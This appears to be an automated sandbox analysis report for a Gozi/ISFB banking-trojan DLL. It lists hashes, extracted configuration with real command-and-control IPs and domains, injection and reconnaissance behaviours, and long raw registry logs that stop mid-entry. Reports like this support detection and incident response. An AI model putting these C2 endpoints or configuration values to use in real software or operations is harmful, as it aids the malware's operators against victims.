Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 12:29
Static task
static1
Behavioral task
behavioral1
Sample
f9d778ad3bfea174401f36a2d88851d8.dll
Resource
win7-20220715-en
General
-
Target
f9d778ad3bfea174401f36a2d88851d8.dll
-
Size
378KB
-
MD5
f9d778ad3bfea174401f36a2d88851d8
-
SHA1
fd2b30e2f029939c31c759d9fbdd5ee5242137c0
-
SHA256
44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
-
SHA512
046ee69e01fc2e64b3cf75ccfa9a0886ef4e6752f9d90e199c67b8cc9cfdf767d8235b3a638fc96782cea0ff1b278f8d36a2ea25c9a5a839c0c03d199de5175a
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
79.110.52.8
79.110.52.80
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
79.110.52.82
79.110.52.94
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeregsvr32.exeExplorer.EXEcontrol.exedescription pid process target process PID 1520 set thread context of 1028 1520 powershell.exe Explorer.EXE PID 1716 set thread context of 4028 1716 regsvr32.exe control.exe PID 1028 set thread context of 3520 1028 Explorer.EXE RuntimeBroker.exe PID 1028 set thread context of 3784 1028 Explorer.EXE RuntimeBroker.exe PID 1028 set thread context of 4816 1028 Explorer.EXE RuntimeBroker.exe PID 1028 set thread context of 3256 1028 Explorer.EXE RuntimeBroker.exe PID 4028 set thread context of 4244 4028 control.exe rundll32.exe PID 1028 set thread context of 3240 1028 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 2136 net.exe 2588 net.exe 4452 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c405d5b7-d2cb-4889-97 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = ca73dba6fcabd801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a68136a6fcabd8018c087ea6fcabd8018c087ea6fcabd80108e61a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346537393864666536353764613932633663376338666661643535336130626636326261363637376430313930656266336165373161616132333037386635370000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d83e0400340065003700390038006400660065003600350037006400610039003200630036006300370063003800660066006100640035003500330061003000620066003600320062006100360036003700370064003000310039003000650062006600330061006500370031006100610061003200330030003700380066003500370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34653739386466653635376461393263366337633866666164353533613062663632626136363737643031393065626633616537316161613233303738663537000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9485462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9485462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\167bd767-e11a-4694-9b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = 12003ba5fcabd801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = b8354ba5fcabd801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = 8c8355a7fcabd801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000282b3ca5fcabd801282b3ca5fcabd801282b3ca5fcabd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346537393864666536353764613932633663376338666661643535336130626636326261363637376430313930656266336165373161616132333037386635370000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d83e0400340065003700390038006400660065003600350037006400610039003200630036006300370063003800660066006100640035003500330061003000620066003600320062006100360036003700370064003000310039003000650062006600330061006500370031006100610061003200330030003700380066003500370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34653739386466653635376461393263366337633866666164353533613062663632626136363737643031393065626633616537316161613233303738663537000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff8c85462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff8c85462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0065f893-8090-49d4-8d RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000929baea5fcabd80198ab3da6fcabd80198ab3da6fcabd801f90407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000323236393033306539653632383732333338313234633561313335333033303362343861386632646533623861346564396431616431363230333033393162650000b20009000400efbe0955e0730955e0732e000000000000000000000000000000000000000000000000008f3d2300320032003600390030003300300065003900650036003200380037003200330033003800310032003400630035006100310033003500330030003300300033006200340038006100380066003200640065003300620038006100340065006400390064003100610064003100360032003000330030003300390031006200650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323639303330653965363238373233333831323463356131333533303330336234386138663264653362386134656439643161643136323033303339316265000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9185462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9185462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local 